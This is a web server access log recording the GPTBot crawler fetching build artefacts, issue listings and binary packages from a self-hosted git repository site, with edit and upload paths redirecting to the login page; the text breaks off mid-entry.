"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11624] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11625] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 9853] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15589] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33315] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11232] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13155] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:19:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10265] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:19:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11371] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:19:51:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:51:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:19:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fxref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 17159] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:19:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:19:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:19:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211047] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:51:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 10166] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10333] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10519] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10847] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211047] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:19:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:19:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:19:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211045] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" -[17/Feb/2026:19:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:19:51:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" -[17/Feb/2026:19:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake" -[17/Feb/2026:19:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" -[17/Feb/2026:19:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 